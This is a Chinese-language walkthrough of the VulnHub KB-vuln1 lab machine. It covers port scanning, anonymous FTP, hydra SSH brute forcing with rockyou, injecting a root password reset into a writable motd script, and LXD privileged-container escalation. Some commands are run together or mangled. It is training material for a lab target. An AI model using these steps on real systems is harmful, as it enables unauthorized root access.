vulnhub-KB-vuln1

  • A+
所属分类:安全文章

实验环境

kali攻击机ip:192.168.56.116

KB-vuln1靶机ip:192.168.56.147

知识点及工具

nmap扫描

ftp服务匿名访问

hydra爆破

lxd提权

靶机难度

简单

开始渗透

首先第一步对目标靶机网络端口扫描 

nmapAp- 192.168.56.147

vulnhub-KB-vuln1

扫描结果目标服务开放了21(ftp),22(ssh),80 (http)端口

ftp看着是可以匿名访问,利用一下,结果看不到信息,应该还会有隐藏文件

ftp://192.168.56.147

vulnhub-KB-vuln1

vulnhub-KB-vuln1

有个历史文件,下载下来看看

vulnhub-KB-vuln1

看记录应该是修改了motd文件,接着看看其他信息吧,访问了80端口,目录扫描了都未发现新情况

vulnhub-KB-vuln1

右击查看源代码,在源代码里面找到一个用户名

vulnhub-KB-vuln1


页面也没有登录界面,于是尝试了ssh,很快就爆破出来了

hydra –l sysadmin –P /usr/share/wordlists/rockyou.txt ssh://192.168.56.147

vulnhub-KB-vuln1

登录靶机,之前在ftp里面有个bash_history文件,然后直奔motd文件,发现可编辑,而且root权限。(你也可以反弹shell)

echo "echo 'root:mrlee' | sudo chpasswd" >> 00-header

vulnhub-KB-vuln1

退出,重新登录,切换root用户

vulnhub-KB-vuln1

看着sysadmin还属于lxd组用户,继续尝试lxd提权

https://www.freebuf.com/articles/network/216803.html

kali机编译

git clone https://github.com/saghul/lxd-alpine-builder.gitcd lxd-alpine-builder./build-alpine

运行完上述命令之后,会在当前目录下创建一个xxx.tar.gz文件,然后将其发送至目标靶机系统。

靶机

文件传完成之后,就可以将其以镜像的形式添加进LXD了

lxc image import ./apline-v3.12-x86_64-20201007_2053.tar.gz--alias myimage

查看容器列表里有没有添加成功

lxc image list

开始配置

lxd init(一路回车)lxc init myimage ignite -csecurity.privileged=truelxc config device add ignite mydevice disksource=/ path=/mnt/root recursive=truelxc start ignitelxc exec ignite /bin/sh

vulnhub-KB-vuln1


本文始发于微信公众号(MrLee 小师父):vulnhub-KB-vuln1

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: